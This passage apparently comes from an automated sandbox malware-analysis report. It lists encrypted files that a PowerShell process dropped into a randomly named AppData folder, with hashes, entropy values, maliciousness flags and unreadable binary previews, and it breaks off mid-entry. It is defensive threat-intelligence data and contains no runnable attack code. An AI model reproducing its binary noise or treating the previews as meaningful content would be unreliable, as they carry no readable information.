.....=......wkX...G........1...r..u.fP..Y,.VT..`.;.......U.H....(...:.h...s{sZ1.......g}.....No-O..&.....{..#.Hw....%....WP..-.-.U.g..N.U71.......D]...Sz{kH..N..@?7.........9i>E......).-..R..7K..T..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vcxCqPUsNdjILkz.GgEqsLRmAHuC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	126939
Entropy (8bit):	7.998530660696927
Encrypted:	true
SSDEEP:	1536:WkWdeQs1QIXSLn2/EZgnDhwN6b5M4R72V4Yfc5zFZ2nwmGB18DHOdCKl1npRSPuU:WkWdTrgSlN6e446Y05zE/QDltMu3j/K5
MD5:	AD1C909BDA85AFB5D4F46CDD5D119877
SHA1:	82B9CDAB3FBF6A4326488C109F986C0B9567C0C7
SHA-256:	4B0F4249AECE4C8489E7F531B7C719F425D5611AC2C99B2D2C5ABDCCB0F63CE8
SHA-512:	E761A14C11221D06BFC3052073FD44B45DA940F7DB90C846DFFE1B9B22F17C5087833D256615CAC0D4747B48EC8BB13D28F042989635B19640C0369E8719B5DF
Malicious:	true
Reputation:	unknown
Preview:	.G[......... PH..u?.1c...q.1.........[W\|...A...Nc.phg...1..I...([Q...."X.....T.a7.i..?..)q..o..S.S...H.N....2\|.`...]......v[s;W.C ..F...~.s...f...Y...w..W..u..\"....i.....C..T...s&2R'"..'.O...Qs...f..O....G..'\|5.CW.S.A8.....k%./.&.G.z.B.Y)..%.r...H.{.$..6.."F....n.F....Y..,{...l.SA..DDU`.Q.....-<..........lK]?'....Mw.;JqF.J_.}....... ........e+\|..@..8EEqc[..k......W..a\...z.......qo.&....r..[MW!.)lE.T....` ....n........f..[,....{N@....k....;......y...+._....6M.-&...$...[OO?n...r...........Kc.F.\|...u.z1...B.2.rM/....aS......a.../o..[N...A..6..4I...UP ]Y....zIA%.....X_.].J......e. ...4E..M6....t.E:.^...b..q.c.....h.....jR .+}. ....p.....O..7........P.C.A.......B.r........=.Pk...Kw.q.-I.3^.9qAZ.x.1z...aQ%.FW27F..FB...E...&..PU.i...Y.H. ..9.&.p............Vc.Z..7.{.D........U.Z.1.....@...K...9..n..&.....5...7)..S.[.q...(.,\|....H:...F9.`....\|.(.'$g....G....4"....QV...W..l!l...5..CK_..@...PE...$.u.Y.... ......m....K..z..uX`.G!w.U.[.?z..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\vtUZAcdmexnYDFaRj.kRJgKncFuMaIPXeDWo Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	154449
Entropy (8bit):	7.998886014359888
Encrypted:	true
SSDEEP:	3072:s174Nmx/2kx/UbnLeMPWedday2Hn5kHVYrkvUS+3OHGtWNKB9fp:Qx/HxuLeMPddSZk1gko3wGtW0p
MD5:	144E0828A4EFF6E176C7719B5397090D
SHA1:	63DFB49FBB44CC338BD1A451640A1DB8B7FCB7C8
SHA-256:	98CC86083017A43F4DB86AA4B0A1AC23E706F7C6726A2BE68103A4DE04FC8A41
SHA-512:	E82CFF75CFDA14A950C7BFC6170BE0343CE15A9A7299B7F879F703243F9E52D5CDAAF121511DB7D8CA9863ED31C98FD7CA90EF26BDD26C1409A2CF2194B57FFA
Malicious:	true
Reputation:	unknown
Preview:	N$...\|v.@o.7....c.`.KJ..J)....]2r.u.js0...Wu.y......~.....S...`%.j...\......'..K.[...'X......O..)..W.'!.9./..,....x.u....0.....ME..>.tw.:9...N..f........T.\|2.2...!..y}..n<...S.4v5.v,'.%? ...ZU.......SC.].K..P..h..k..D.:\..f.8..+.xG.....d.G.....W....=D..w.D{LK=r......../....Hb]....:.;..._.=O.....~Q.:...\u../..kG/8...2.?...?..\|....<_G...0.V.G.....m....5.R....I...&.fg=......3m...^.KWBz}Nz.....V.w ..T}.u=.^#.m.%.I{........6.%.8q....T....y.Y..0.E..U..u..et.>D.g..v4(/....0.!..u..t.TL8Hm.ku...n.......UN.D.Cy............7.Z.!bd.....W.d....E..g.l..T.......k.....?gx...\|.Z<.j..].\..$H:...?..u....RzW.P..<sH}...Ij...........k.^.E&..._....T.B..2.D....u.:...\..."#9#d.x.....@..?..L..n..C..Z..:6.........<.a.G.1..`j.1..q!X.c'R...ScL.....2.O.Gy(6.l.nj.......v........."_.~:.v..U..`w3G..iH..KS.B ....V...LrUe.s,~!.....M=.9.Z.....j.#...En..V....I)E(..n...M.7..m..f[...?/.x.X.d...x.:N.;{..a.....'..o..~R.....IV.M=)3..+...:Gp.Y<1H.."Z....D*..D..!a....C...Q7..XZ

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\wSUXQyKWRIAgYjn.svjBtdgXJueqnwfGSp Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	55044
Entropy (8bit):	7.9969933743405415
Encrypted:	true
SSDEEP:	768:EJv7FDZ0xhBBOP635aIy90tvfdePkQrjsnx2mCoOHuVGgeXkuc1msjUmM3kyzqM:EN7jqgP63kOeMQixlAkGgeTEmsjxMU6
MD5:	D5DD4EC2E6D65846A6674DAB53D43033
SHA1:	DEFA4284708967F8E77B80B1F186A872174287C5
SHA-256:	B38EF898E92D7D9D982B8AB0F90BE04B0F9D2F675779333708C48EBFCFBBE6D5
SHA-512:	D205791A14B76F9C6CCF73A21AA0BBD34E916ADD407A053FE1FB86F7ED7BBD684A1E72ABF151AE66F4ACBF5AC5B9DB399E0E47BF897D844DD415A925F01D943F
Malicious:	false
Reputation:	unknown
Preview:	.mp..l.D ...%%...+hq...%.....Gk.I.r...Ix..K...0..G..iJ.\..v.S.....]..[..t(B....2S..$.h('#.O.....Y. =;.]..lA.y..SDG.%..s.6.3.......k.z...1.A....6........jR.i.Q....+..O/...Xw..(..6o.....(...&F)...?e...f.l.@..P.......a...b.P..../....F...n...2S]=:............'..& 6$.'9Q.d...j..B..g.}R........F ....8F.Rx.x...I.PH\|2..~7...<.h.......j..om..,..ne....)C..A..;......\..\|g.;....~....R@nM@.).F3`..b..l...<..N..-e.nmR7w.C..x..!..,....O%..M.>..:...2..v..:.]#m...q."MM...H.[.a{..Jf...........K.`..l....n\|?.....M..H.-.,l<.)..Ghl.f.V3\..r.O..R3%.(D...(@o.4...4.4#...\|dvh.U...[.O..#......m.........-.../.......0m.../...U..gu.:...K.".qC..z.Y&.M.u.....5...T........qPF..2..b..T5....c.n.Z.D%.Rm..{..`...x.o....bo...n.[........Z.....7K..g.."Q%...>.)PQ.4....E.+..X....~.z.kC^....-...W.X.....!...\._..L.\.P........z....P.....IS..I9\F%..........<.!5+..C..........3..l"...F......+.h.._.mqsS.....;T.gB.......S...c...S0............F.f.V..5... ..oqCt.\.7.1.D.4q^.3...B`3"L...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\wTlyomWzBMeaGY.CrGxtklDXV Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	60889
Entropy (8bit):	7.996582645960718
Encrypted:	true
SSDEEP:	1536:zNNldkOotC58e/8NX3pyUjd2lZ5JvtJBlksZW4VNgHjGD5q5qQlr:zPliZve/8NX3xAZLBJZYMOqQ5
MD5:	DE2E1BF4FE38A39F2BE6C9BF8D769037
SHA1:	E71D073AEEF8FBC9AAC2B7A45C543D2BADFAD090
SHA-256:	E2A1F23C20323564445DD25D6073423D29113B5D72856CBA60056D27585B261D
SHA-512:	414F0C8DB173FB9507FA79CC20ECC53382BCD0FDD7CD4BCCD6ABB49F10EC11E3335C8E3DA620DBB136DB4E1665BE327C40AA9072395EADE78CE206F5B8002AA6
Malicious:	true
Reputation:	unknown
Preview:	.....P..!O...F....~...a.q..1'...f.?...>...rml.O..7$.....mw..e..@........J..&.~6.....p.(h...~..2h..H..6..Gr+.. TW.=.z........F...Di....v!4iR....T...G.zoPA+#..+`.8#..X...%a......i.6 \...iR.....i......!...IQ.. e..BE..W.M....V[.l.$:'%0...gmw..&.Bd...y.\|..,.....w.a....CNw.7R(......_m-u.6N..O..M.-Z..'D7.2..D..l....&S.U....n..A..d....;+.y.......'p#...Csw[3-.Z.......c..)>iL1(.e.g..._ ..?J9..&.......V...AO.........Q.....I.D..lV..k...l....;......fp.,...V1...`.y..Y%v%.....@..02.p..R?......D..+.....+@...7.pq....&Z.FGhSt.........$z.D......b...5A..R..Ol.0.-.;XZ..P.....?.....(0./_*...`.......0...$..{.....'.<.~&.T.d\|rr..A...g6F6...Z...M..hpf6#....(S.........`[...~...z...w.....]..X.{x).7>;......'....1ZX..I<..C.R.+.O.p..;D..g..Z......&k"]s...F...<...!..2..}X..i.]..V..r-.....C...X.mw....9...b.....h".-vx..N..:\.S.'@.X...b.p....W.@p...k.{6I.m.8Q..@.. ...y&....d..:.I.?a....^7{.Z..KeP...E..Ao...U.VG..J.T6....g.....d...eb.L......d..........iW.M....

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\wVxiapmoDynFfTc.qSyDJKXHkQsTfC Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	98159
Entropy (8bit):	7.997826463397438
Encrypted:	true
SSDEEP:	1536:u2SavFh1U/fV8iWsKV6i9U+CIzETkxWxQflGZG8IrZrBLqdgBD9qnMoY1:u2S8jQfV8/sKoiuvIz8kxn3n5L
MD5:	46291AB2589570F17FDD704EBA658BD8
SHA1:	085332B945B9B0AD83E1BE29CC493E8490704DA4
SHA-256:	903BE0E41F7DC5DCE0C249C5D2648FDFD15462884F6BC8A58E139749D6B2ACFF
SHA-512:	8D8377631C9B4C70B41D6E3D1A6FCDF570D21F7B45EF885E75DF3ED8A7569B26632CEE1DED534939C508D74C5BC87C7337691F796389034F8667F44E49146B89
Malicious:	true
Reputation:	unknown
Preview:	..a..{..5...`d........L...;.......p.y.J..SN.B.H.6cbd/....#m0W.G\.'K.<...C....BNN.#mC2#.j.[.U0.Vy...t..IMD (.......3$..h......).....3..H#...../Ei..m"T....".L.W.x.D..C....<...U..?..:.F..G.N.j.....<...7T....{.^.M{:........(...aj^.^..U.-........2.H{....,X..-.b...n.......0(.......!.-.;...M.!r...c-....Mv2A.`.#.X...A..Q2..7.z.~...X.E..l.\.5.z....H...y/..L.4".1~zy...m....P..3.kEdT..\|d.".5 B(xs....B...%?....k.L.mI.....$7.Q. .o.3.)DMy...6k..}.9..Sj..\.....G.8.".p..h..9]m.[.e...0...Z.+.{.3#9.{.J..M.a.#.6...\++p.T....[y..M.#.....P.L......e...&O.5.p....pZ...Af.r...O..i.jE.ZQn86......UC..q#..)..^..p.j.&w.....L\....M.E.=.e.G..1:P.f.d&.4.`.>:31%..!...E..2..,.....0..^-..U..}...3b........1m.....Yl.7?g.Mu8...0/...]?.:".e.L.f.L.,.b...#...4sf......>YL..IP.7......`k...D.z..J_8j.......CMz...A.O.d.id...S...r....,.o...K...F...(...X.~.v."..t..L....&...<....Tr..X].Lg.].`./....'.~....q......@i....".A..&..I...[...(#.....3..W....h..=..R..+Y....1My.l.[ r../.U..W..._.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\wyXuHqjMCEcrBLWzsD.YoHGmskqxCvOAMKdeb Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	54522
Entropy (8bit):	7.996559642089071
Encrypted:	true
SSDEEP:	1536:1y6aCmIXdgeQFDWfxbyc/NAKS1eV0VEgO1cwonN6C+:DDgXFDOF41eV0Bacwon3+
MD5:	78B3AE4ED7F29B3023DDE7D6B12DAB53
SHA1:	039F10DA30B2BF2F56DB0AA824EFB9B33C2471DA
SHA-256:	CC9DC6586C799CAFB13F45941D43443F0BD4D066DC3A837B72977FE8D406CB2E
SHA-512:	81A27223CAB6D4F2C0AA2F713B599C741B46322FCF9408F03F875E017B813FA58687A61CCA3355A9B7C1EC3D3E20361E18631E0635839BA3BE6AFF59A4804C52
Malicious:	true
Reputation:	unknown
Preview:	C?(#.......K..:.=..:S..Y..yL....Z...C.M...p.^7..a..1m.w.:.....[....{t..o.AE9.zkI&...\|)y.M...'..m=.8.7.L.#.5...9N.5}.(rp..t.X..,6..B..N:..."..~..h....Qco.$].N4.~...C.{.{.XQ.{..M.d..z....I.=.X.l...MR..L...\|.l....c}'..w..g.....UX..o....N.../....h.Q.....n.O...fP.%.O[.$(...aixC{-=.Z..C]r].W..D..Y..1Y..IZ.~.{f....2...&.."......g..4.....YR}.$qE..w}<33;....H.!.R...~5.......>...r....G...MU..\...{3..A.x.`.....k..z..A...6n.P./+....1._H.(.E..o...W,..."....^..T.>t.}9.m)..;.o........k..VL..\...11.1b<....[.S...L"...aGn.. .O..Mk.e.1.......K>.\|:..R....Vw...b...<R(l.".&.B7w0y..X.b.$....%.U.7......J..+...K%..Z..Tf..f.N...S..H<j.......$]..!h?....%..B.5.................z_..M.....soy...MwVW......6.C.\|.G..sQ.3... W%.#.R.\|.L..S.....o......}".P.lI{..V....R.A.........dK< .5...tY..1O...#.)...,.W..>l.../{qJ]..9.D...s......:."^.@r.6.*....E..b...l...4.#..lY.i.....W..Pr.o...eJ.MDt&\...[w6..{...0M9.}..7q..pcT.`R....\|....._L.Qh.0.....7...j..#..Co6.u...\.vw...

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\xCLKPhnZkDmIvTO.WQgcTXVIbSxFjhin Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	78206
Entropy (8bit):	7.99753708775384
Encrypted:	true
SSDEEP:	1536:g0/iPhZ4nJfw4urWDp2Fm7/tlR+NeHRP6zleHycF+AtgrxZmH6jL1VT:gDLQY4Lp2I/tlkcozlAyBAtixIHC/
MD5:	31567DB0AF7820D14B9E084B9E73CA5B
SHA1:	04C14AA8AFA161754B840C4EA4CDBAF3F6370CD3
SHA-256:	A75B79B55FE9011F98F0D7133F8B02326FAAD3F43BAAF09187F1306448B13C30
SHA-512:	966AC79055033A1072B2A4409ECC76E14EACF63BD0DD56A75015E557B91682A8A9E7E2C0349CA9C048205C3D7A625E9D905040436622532F24F176DF7BD796F0
Malicious:	true
Reputation:	unknown
Preview:	B....6.'c.}.qg.U..Y..a...n.&??C..zW,...l].....E1.A.@'.P..(..$..d..B(..i.N.iF_...!...^.)w8h/..uj..!.X......F~w.H._..'.......2.8.g}<=.p.+V.O.....IhI.C....$.t.4.m..p....%Z.I..c..9.+$.H"...%...y>....Iy..r..e.}Y.aC..A.['....u...<...G.E.4...{].........,Tf.....)...Zd.;.(Axw+y.%.l?G....S..Y(\|-9..d.(..O.._3\|....j}.x.\|.....>...P2.Ol..8......A...l.}Nu!..lVK..iW_......@..0..:H..o!.......s.8..f.H..M..^=.....2.RL...Q].7.W.B2Y.I\8..:$.E...Xd..k..l.Jz...c7.k.@Sm..........vl;0...$(f"M.....?..MQ.....}<F.K=...v..:.E4.F..7poqA..).....4.. (..(..s.....=.......qk.C.p...Z..D.L..m..!..n....Kp@Y..g...[.. ..sNG.g...I.H[V.m.;.+...=]..=.t..t.^KS&..s1.t<.imqA.......A...m.R.".....r.>...k!...~..;i5W...H....G.\^P.....a.....6.g...0.........#M.T.a.7..i.....)&..`.\|.,.E>._:...+....(.r.".....b...)..4.r..t..ay./7!../p..P.>........`........{ke.*..=.{..g..3m...q...TP...[.......!..cH.{...G.g.....i./......}ZeP$j..6W?.c...i/U...S.a...Dg{..(...w.ot....`....C.G..........[

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\xCvNDnGRtkyP.oBUdfHMyXIEs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	110652
Entropy (8bit):	7.998584312383623
Encrypted:	true
SSDEEP:	3072:3giCq5zdC0IUnauhpro8LdO3weFomtn7fMlKcleMDP:wiCmzdRDYwdO3VUEcle2P
MD5:	BB6E65D1AA6BE1BABEDE7857B2AF69BC
SHA1:	A4A338926037A273A5E9F6743B1BBC1D872EF31F
SHA-256:	19EF58F148AC78D176DA969B87450AA453733B44C4032FBA2CB419E93B875377
SHA-512:	02D4524248378C8AB57FAFD19872A19EDA30CC801748F60765066F53B933D96320296C226A1F258C43DED5A4DF390F528DE870F98B5882465272BC0496052AB7
Malicious:	true
Reputation:	unknown
Preview:	Ch....d.Obb..kC.pi.z(....u..k....R.<.... .'.o...g ...e......s]^..gj...[.Z...Ql.........~.N..-}...,...;..[...{.4..o.x.y.f_e...M...p.P.#..(.....K..>.....rM.\c~9....~q...T..QW.q.8B.Ew...V...2.w...C..H.].a;..j.+;R.Y..{...<...b...``^.aG.....IO.....V..D.i.%h(.[...X.z.D.gS.....h...acj....;l...EQID..{.....P....N9f"....x..[..7.....^.M.u..0a..Qh./.......w8.6.w.W. ..&...G...b..l...Zg..<..(.S..Z`H....&....3....3s....i~..#.MDH......Q6.t.K.2.N.V/ 1..[...fn.h>..a...=.G.mjK..i.$...7....hA.0u.....7>..W.".....P.Q.}Ri.C...8...Wa.n...#.b...I....Dj.r@v...(..).y\43!j.....Z_8."&.5..`x-d.....S..j..l.u...7.......).....x..4....w.6o@{B(..I].q.....Ye3......b.7.N...J..s.....r0....P.rC..&....UL.o.......1.it...3...Ho.....]3c6..,..:.pB.@_...((3.WN.'......2....rg ..s.}./ ....d)........X..p...)..+....nee.).w.\..........5m.......\..('.k2.h...A.A........../....J.q^&...,.U...T+.}...`.\WG.....[..H.M.8.dR...F6..)..xo....(...{.6..Z.a......j.e..b.l4...F<....@........s.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\xjuhFBwiJWHUPL.vJEDnhowItmUr Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	103760
Entropy (8bit):	7.998286181616738
Encrypted:	true
SSDEEP:	3072:EAtIgRfqaRBV1M7X+ho71dNJxT7n1Fwhm8rXR:egnV1YX+g9prGrh
MD5:	852FC6395E6AF0F976166C145BBC1209
SHA1:	44CABC07A6A7D718A1949A97251B5C8C28355290
SHA-256:	41D4F0245EACB0778C7381CFE55DAEAEF842D6D94A0AB692E422036368047D3D
SHA-512:	360A6C6537B7267D8204F19741D37A25AF6F5CA3E056F0537F07DA6AE953A9FDD9AA8B9499A9D51E19C454CB2ED211A32635505D841C29B3E3CCE1D2FB764541
Malicious:	false
Reputation:	unknown
Preview:	N.).q..I...zC{....'.b.'..oI..._.n&...J..5..~W........(..l ..%.'/...U...T.V,.7>..-~^..#F...H.uk....V.].Y.m..~.y&".K.;.o...8....yw?..G< ...J.XwV!.} ..3T0.8^PM..:(.......C._...Lc.........M...R.............ob.(.l......hnQ..31..!........%+.....vN?......[....h..M.@..z......}Xf.....Xj....{Z.G.`..].z..:......,......X...4.8+i..,.5.....8...Nx`L8c..1...!j.vT.s$.q.th.....R:.....^..\|!..`...i............v..\|v.....JS._..].U3.Y..<.#.j...l{.\|L5.Ve..<ptT.8...if..x:...[.......?...R...X..13G.......v.m.4.t.Zp&....X.nf..)......:.n.o...R+.^.7...KwDR...M..2..G\P..@...:.^Bh~}..,.$...[].!....>..Ry.X.r1=W.a.......~...I.f.X.7...\|x#....^;...$P...0u7B...unv..\\...ub1x..a..O,B....g.y:..^.;........\.~._O...SH,.S...}........fJ.m5.)....)X.....oj....A/.....%T.v.....E.S.....Ej....+.flO_......:..@..\0..1...e.....f.{-..O...%....d.K.=Y[:Ap...B....=....9.*QD.l.T.]..q...9.oi.>..W..... uw....Y.$9..+M...2.y.f...(.u......i...J/.Y....V.6....Bg..Rn.8k?)H.2r.V.....Y...s.u..

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yEeiKNMUkJ.hZHKCIGlTpYs Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	101590
Entropy (8bit):	7.998371101205955
Encrypted:	true
SSDEEP:	1536:b2osC1mhHNdN81pdDrLfNr0j2Bf0okhcBPJazE69A6x+jG7pJcRUFT132o53:VsCwhNf8ZBrzh0mBxv16x+C7piupBh
MD5:	2B35F6059F0DB927A969F74A35F71431
SHA1:	8ED83E1AB1A7FF0325C4E822B1E6A83133FFF11B
SHA-256:	E892C334C515FF09BEAD82F97FEF602113C57717513EA6234F7D11DB23B266D0
SHA-512:	5D7AD55721088112E5055D8E254378376C737272267B55F56830C849186F60EB096D02A1A3BDCB860188FE4E9C7FABAF96F5A8771CC4F925D414DE369213D5B2
Malicious:	true
Reputation:	unknown
Preview:	@CigN.J;...6...1.6.D..m..^.D,........S........L.s.vJ.w.z.!..=..T. ........&j.tl..6,.z.&..c..v../..W.h..`.[.L..U...j...a.'....];..b....c!.8..9...V.rk...1A...$..~..........O.h....`.b...3R.c.a.:..J...P..d.....S{........_...c9...2....@j..m..../..bc..{x&YW.qG..jv..\|.<R2..d.L.Uz0..w.T..i....O&....l_%.k.\.P.:q....k.....8.K.........v....../2...a..0...uRc2....j1.E.(.....n.6.{[.q.....E[...J...H.\.J.{..+>..>....K.\|Y%hy......V4....7/..rP...+..G.;.6/..M..rx5xP......\|\....&...~..".....K_:.....c..g..o....6&-.~...-....0.r....'R....9..f\|.......o....mBb..r....T.....Fz.w..`g.S... B1...D.@..a.O.B.(..Z$..h..&\|........../..:}.....C.....<.E#..-!....=.3%=....w2.....@q.F..O..\|un..L.....Q...3.....Fr.>.Hf..up.O.........=...%B....W0...E...Ai.a......q..\.H..!Y3..b.U.f.X..}7.`...C..{I...K...D...Wa..!..2.ip.e.%......s.....j.,..+\|7..a.c.......o.A..d.KW....&..?........ .$1P..b.R....\|..P^....I.Ig..# .D.&&>S...H.q.#.{...<2.Yy.....{.....r...$&.....&JnSc;....6.$..X..lV}

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yXfaYDtbSgRH.zhCOJToUEjcYLaPi Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	78402
Entropy (8bit):	7.997546184422297
Encrypted:	true
SSDEEP:	1536:8WNle7fjT9jS1QGFFOpVEiM8vNv7OVtTZ3C8LV7HF87/Lm/8dPoRdj0:8n7fvaZXOpQiV7OVtTZ3C6t2N1
MD5:	4E04E232AC7A5C1C70D957BD43168E89
SHA1:	2CE38B00861596DB463456635BA96CACC1DD9CC0
SHA-256:	57F1B203E5EF6EA2D73B4B12292912D735779DD63D22B605C222CCDAB379504B
SHA-512:	0B01C2F875086358D007E8F3C84554A1139D16F738DEB165EE2043D2613E2079366B976733B366677EBEED845450445D8A4B4D9E40DBA4B18BD4A563B98EB0C2
Malicious:	true
Reputation:	unknown
Preview:	....dw.X..U.,p.)T...?......g..&..fx....(~.....Co....{.H=rPyj.w..^......b.`.r......pAn..;.i$(..p..xI9.OrS....Y......=...I.0=.....A....r.{S.G.2......vNIL..B..O]..T....F ..k.gS\.>.8I...fCn.0.z.5q_F..ul.q..x.8u.\|.}$.wiai.....'.63.....e..].z..6cJ........j.M.\....s0h..........2..oK$M./.Z"..{....)..A.n.1."7.td..=[.%.9J]...8P.........R........w]....u.m..}h#.k.C.F.~...+.(LrN.......G.o.#.cJA2...5.y.6.5.. ...r..f.Yv...D..^A...k...+..T[^.N.y.1.h.vl.m.5.M.....>..\......0k.U...{+..R...iF..+G:....~.qQ.(..E.S...?`_,.gs...z.0..'........J#.1.].l.. ...O......y6..@........O.d.:..5w..7wi......i@..gh.g/ ...W...fC.+.o.i...%..Ka.....1.N..~i.......e.S~h..AwC...\3..4v&.qXJ...Pm.Q.3....W........{=...W....x.~......k..B..jqb.U.y4...r...*X.y...B?8i..`vvC.....J...a..L@.$.3.."...R.k.......0..I... .Qz.-bw.>.Q.vX.3...N.+ C.\...L...........CS3;...Q..De.17....~d....(]R=.....E.AK...N'.........MT..).V.\|..d'...Q....+tk.S..g.".wz..C"[M.F.rk..F.%-.!.'...^.........vDt.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yXsaiIBkMWFGvKE.jFapSqMQsYy Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	184415
Entropy (8bit):	7.99904603832578
Encrypted:	true
SSDEEP:	3072:xvFmMyn4FL3uNesV8MGr3pqFsZTcziRbqkmVPIC/WLGiXDvviGm8M8UcVFO7tIEs:xvFdFzulKr3pisZTTRGkwh/q+8MTeFOO
MD5:	280A5FE6EE6E8BD092BDE1BBBCB5B08A
SHA1:	C55B34D42E351F001DAEB3326B2834150A8001B6
SHA-256:	190677EDDDC82AD869C585A716C093454FFD45518DC6CCC6D026706C37D1913D
SHA-512:	8D46A4331A933C33F47BF39B213B2E2C60B100D3EE1E1660105A324E5A973857C51DC7F7EDE43D7B1980A1B22300DCA1A3AFD90CD9477A388C46E8E9AB030BF7
Malicious:	false
Reputation:	unknown
Preview:	J......J..h.>}.=..I...@P..E...z.K..4.%.)(.5h:....xEGO..O.S&...W`2h+..fU.u......2.4...7...%.3....bz=...'.0w..=e.a.+^6...0........4.$Ja.E. 8.l8GL.....^.g.\|#,..f..T.A..6..T.i.M.:S...U.....!x%t...~.....H..../....J~...>,.@..K.`Z.9..]......}.}...Mt...0.W.NWG.6........$QG.s%e...\.....5......O^:.X_..:.oj...\|..4.\V....H.K.iSL.k..w<.c...5..R....g.._.m..iO...d..r......U..i; ..6.r;.z..>V...~..}YE...G...eu^-..f.H ......vZ.....W..jA..j'=.'%..6..va.9.;..,...xog..:..R6%K..f3..=S..Gf._..=....>....]X..?;D}...Q..Q.(..m(..?.$.}..s.....Y...+Y..Rl..Cx..v5.F^......Fr[...( .L..U4.?....M.Z..RQ.Z...2J=...z2.W.p.9S..m_.oM.....9g-..Q.....H.:]....p.@S.'q....@..#.AnH..$`......H.:'...)8.J.-P...d..R..%J.S._'...............f.....g.c..........`.Z<....Ix.U..D...V.l.}....UZ0..o.............>y...n.e}.pN..Bz....N4q@O..R.1_...l.8...0..<B~.=..p..\..l...<.L_.Z3.f...\...\.......K,\|b.@......K.G..G.>.h.).'..q6-.0..O..^vC.I&..>....h=o(....}.%C....D.c3.d...toH.>.^2.y.i.X.....c

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yqkPMnCBgZEtKNlp.hCKVUTmsSEOodeJwj Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	195600
Entropy (8bit):	7.999113545669554
Encrypted:	true
SSDEEP:	3072:4jG8F7wZ+PsmYo0R6enh9tT3Od9+tTckYpQB06okdJJiOz1/umvW74Ixf0pGO:4KPmYos6glIq4/6oGi2/Fvs4IaGO
MD5:	1E9A0FB90682831EB9A32CE8984C24AF
SHA1:	697606FA4696651B52479EF91105EF5B679A54CD
SHA-256:	BBF6EF2719AB549A0B3AD4C0F0871E2DA39D17F8453091E0E7EC96453CF8DD1C
SHA-512:	C2E575563CF5DBF969850E643E0898CE116192A5BF1D924DC574EA2B411C894B210242B2366C7A6D7262227A49C5543D5846ED3C51C411978EF3F2237DBD4B24
Malicious:	true
Reputation:	unknown
Preview:	B......:z..=.....u...p.x....%.t..2..x.d..&.."\'.\|..+,...1c}............hb..Uw..T...W......\|}..M..P&...z{...G.jb..Sc.......P.7...l.o5.:...C...~...=.N.b.jp.zh]...n.&IE......w.3..l.'.......Z.._..X.R.m.8.E..~...C.K..8.y@X..N.B.F.y..=m...G...\..:._;W.TX.}...O7...}. ]Z"W..... ..hc<=..k.(...........<..CXX\.......h.xO4j.A.l...o..:...Z..'x...R.<=.H........vBc..}@d[....Q.e."v...&.1..R..[..J.....Doa.!4.BG .].~.....x;{.u.l..0.D...Hyb...u17.vei........N...(..;...b0d.....I..$.VzQ.wi.uU..T3.x^...e.oz\../C..a......l..:PS.N_g2....O...R.2....r...7p...5.....w....g..r...Wb..`mL..2tv..U....V3...R.&..0V..a.m\|:.D..AZ..B.$..../.Q..n$.D..A..J.u..J.4....Xg.....i.{WS...u...V.....?.1.!)...8X..R.."C.bO..:.1Go.\E...I.1..*.<..Z.<(F.>.T.;.HA..M.....(...O7...>...G....x9......`.jh.W.~....Q...........x.2.<..hZ.!M..T...2jF[..!.5."..S....$.A..Q.K.O6.u.`x.J..7....E....,i.......c.K.h.v.y....5...?S.;q....D.U.j..n3.4.bT.kZ...G.C.XI.:.%]...4.9My.b....3.t......a..k, :._.U.

C:\Users\user\AppData\Roaming\Microsoft\dtHwUGMVpNuBrlWFzj\yziPSgOCBqMWan.NgZrRFtVLKcHuI Download File
Process:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	68092
Entropy (8bit):	7.997535758914459
Encrypted:	true
SSDEEP:	1536:Ha+DH9iY+xEm56Hd6SRdulpDzeZXW0KmF80oORivPpT43mddyqg6m:6+DH9iYMEi6Hd6+dulpDC9gO0vBTJdyB
MD5:	E47F109E0A9F2F43FBA0FEE2FF85DE93
SHA1:	D580C4ADE81C2BD9A884432CE8DFD647E0E768EB
SHA-256:	799F7326BD781F489F73CFCFA2F4988B14B6962E9223A5831B073B83AE75B93E
